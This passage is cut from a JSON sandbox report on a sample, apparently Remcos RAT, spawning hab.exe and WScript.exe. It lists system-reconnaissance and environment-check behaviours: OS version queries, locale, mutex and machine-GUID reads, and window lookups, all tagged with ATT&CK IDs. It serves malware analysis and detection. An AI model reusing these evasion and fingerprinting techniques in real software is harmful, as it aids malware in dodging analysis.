of \"C:\\\" at 00000000-00005844-0000010C-1064902\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005844-0000010C-1071034\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1549432\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1572438\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1590021\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1598273\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1256970\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1269200\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1281356\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1287799\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006072-0000010C-1433045\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006072-0000010C-1451540\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006072-0000010C-1467740\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006072-0000010C-1476938\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00003276-0000010C-554706\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00003276-0000010C-567294\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00003276-0000010C-579716\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00003276-0000010C-586559\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00001464-0000010C-1341685\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00001464-0000010C-1357996\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00001464-0000010C-1372528\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00001464-0000010C-1380602\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00004444-0000010C-1031444", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059797798010000a00100003a57f1013857f101704ef1010000ee01544df1018800000088000000176879770053f101ff2b7977dcdb9c770c57f101ac012d0000002d000000ee01f862ee010d00bb00ec000000f862ee01b851f10110000000000000000e00b600ec000000f862ee01 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000400000000000000d8ebd875203e66000040fd7f9a5c7a7700f0fd7f58c012004440fd7f00000000400000003f000000200000000040fd7f4cc01200c15c7a7760828177200000000040fd7f9a5c7a7700f0fd7f70c01200578979778083817713178975d8ebd875 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005840)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059797798010000a00100003a576c0038576c00704e6c0000006900544d6c0088000000880000001768797700536c00ff2b7977c2b69c770c576c00ac011d0000001d0000006900f86269000d00bb0019040000f8626900b8516c0010000000000000000e00b60019040000f8626900 (UID: 00000000-00006044)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006072)\n \"hab.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000400000000000000d8ebd875d09e1c0000d0fd7f9a5c7a7700f0fd7fd0cb120044d0fd7f00000000400000003f0000002500000000d0fd7fc4cb1200c15c7a77608281772500000000d0fd7f9a5c7a7700f0fd7fe8cb1200578979778083817713178975d8ebd875 (UID: 00000000-00006072)\n \"hab.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006072)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000a0f12700a8f127003a178975000000000000000054f227000200000000000000000000000c0000000200000001012700c2ebe375ec5b78774da0887520020000fc5778770a9f887530010000fffffffff0f127000000000000000000d4f12700ecf12700010000000000000002000000 (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e1757748e9e800fefffffff5f67977634d7a7790a23e001015b56b8808b500b2f479775406b6774ce827000000b46b0000b46b804d7a77b009b677f0000000f000b46b00000000b8e727005c0043004ce9270000000000010000001ce8270040f57977000000000000000008e82700 (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c40941000100010040e6887678e7270078e7270024597a770000000068e88876e8cb3f000000000011000000a0e72700575a7a77000000000300000002000000000000008800000001000000b8e72700459d11760000370000000000800000000200000000002800dc1ab46bcce72700 (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000283f736a08000000fa3e736a883ca5ea020000006842736a000028002f18736ad0a03700c8a0370008d827006842736ac8d82700ce85746ab4dbf180fefffffffa3e736a783e736a2f18736a5cd827001e3e736a2f18736a67c111764460756a78d827004642736a4460756a00000000 (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f01a446a08000000c41a446ac42137e902000000d41c446a00002800e616446ae8a13700d8a13700b0d92700d0f0456a70da270053af456ae8e25483feffffffc41a446a421a446ae616446a04da2700d91b446ae616446a67c11176ae058c7574578c750000000000000000cc928875 (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077b0fde800feffffffff2b79779a2a7977f0f0e771f0f0e77100000000bcf0e771b69f7977000000000000000068f1e7714032410068f1e7710000000002000000000000008800000018818177f0d92700459d1176000037000000000080000000020000000000280098131f6904da2700 (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebd875d076420000d0fd7f9a5c7a770090fd7f50c3740244d0fd7f00000000400000003f0000002800000000d0fd7f44c37402c15c7a77608281772800000000d0fd7f9a5c7a770090fd7f68c37402578979778083817713178975d8ebd875 (UID: 00000000-00003000)\n \"remcos.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000400000000000000d8ebd875683e210000f0fd7f9a5c7a7700e0fd7f58c0120044f0fd7f00000000400000003f0000002000000000f0fd7f4cc01200c15c7a77608281772000000000f0fd7f9a5c7a7700e0fd7f70c01200578979778083817713178975d8ebd875 (UID: 00000000-00001464)\n \"remcos.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001464)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059797798010000a00100003a574e0138574e01704e4e0100004b01544d4e0188000000880000001768797700534e01ff2b79773aef83770c574e01ac012a0000002a0000004b01f8624b010d00bb0066050000f8624b01b8514e0110000000000000000e00b60066050000f8624b01 (UID: 00000000-00004444)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059797798010000000000000000000010fb120008f9d6010000d601dcf7d601feffffffde64807727a17c770000d6016b010050435c7977000000000000d601000000000000d601000000006a00004000000000000000000000000064fb120000000000000000000000d60162000040 (UID: 00000000-00003528)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003528)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005844)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006044)\n \"WScript.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003000)\n \"WScript.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00003000)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004444)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003528)\n \"WScript.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000956)\n \"WScript.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00000956)\n \"remcos.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000888)\n \"remcos.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004516)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003748)\n \"WScript.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003080)\n \"WScript.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00003080)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005840)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00006044)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00006072)\n \"hab.exe\" called \"OpenMutexA\" with parameter \"Remcos_Mutex_Inj\" - (UID: 00000000-00006072)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003276)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00001464)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00004444)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003528)\n \"hab.exe\" called \"OpenMutexA\" with parameter \"Remcos_Mutex_Inj\" - (UID: 00000000-00003528)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00000888)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00004516)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003188)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003748)\n \"hab.exe\" called \"OpenMutexA\" with parameter \"Remcos_Mutex_Inj\" - (UID: 00000000-00003748)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00002528)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00001244)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetActiveWindow\" (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetActiveWindow\" (UID: 00000000-00005840)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00006044)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00006072)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00003276)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00001464)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00004444)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00003528)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00000888)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00004516)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00003188)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00003748)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00002528)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00001244)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005844-0000010C-1040267\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005844-0000010C-1041805\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005844-0000010C-1052622\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005844-0000010C-1054257\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005844-0000010C-1064902\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005844-0000010C-1066559\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005844-0000010C-1071034\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005844-0000010C-1071824\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1549432\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005840-0000010C-1551787\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1572438\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005840-0000010C-1574779\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1590021\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005840-0000010C-1591846\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005840-0000010C-1598273\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\share\" at 00000000-00005840-0000010C-1599201\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1256970\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00006044-0000010C-1258573\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1269200\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00006044-0000010C-1270718\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1281356\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00006044-0000010C-1282869\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1287799\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00006044-0000010C-1288623\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00006072-0000010C-1433045", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call EnumServicesStatusW@ADVAPI32.dll directly followed by \"cmp dword ptr [ebp-08h], edi\" and \"jbe 00411091h\" at 00000000-00006072-32745-435-00410D8B\n Found API call EnumServicesStatusW@ADVAPI32.dll directly followed by \"cmp dword ptr [ebp-08h], edi\" and \"jbe 00411091h\" at 00000000-00003528-8193-437-00410D8B", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005840)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"hab.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WScript.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"remcos.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005840)\n \"hab.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006072)\n \"WScript.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003000)\n \"remcos.exe\" called \"GetForegroundWindow\" (UID: 00000000-00001464)\n \"hab.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003528)\n \"WScript.exe\" called \"GetForegroundWindow\" (UID: 00000000-00000956)\n \"remcos.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004516)\n \"hab.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003748)\n \"WScript.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003080)\n \"remcos.exe\" called \"GetForegroundWindow\" (UID: 00000000-00001244)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")\n \"hab.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WSCRIPT.EXE\")\n \"hab.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WSCRIPT.EXE\")\n \"WScript.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"WScript.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"remcos.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")\n \"remcos.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872604ef101eea3a072944ef1011500000098473000609ba072a04ef1017d9ba072328a9a7200d0300097a8a072130000000000000038cf3000984730009c4ef10194f9120094f912003ff29872604ef101c3a5a072944ef10198473000c0e5967238cf3000340000003857f1010000ee01e05ff101c0e59672d8f91200dcf9120000000000e10000009cfa12003400000034000000176879774057f10100000000435c797718da9c77704ef1012403ee010000ee015001ee0193aba07200000000f862ee01cc4df1010000000098473000e100000000fa12005001ee01b7aba072 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000088d66500f69b7c7798d66500d0030000eefeeefe2200000078d565000000630068da6500000000000000000000000000000000007c00000064d51200ca5b797722000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600fcde6385ecd412006d82ac759cd6650004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 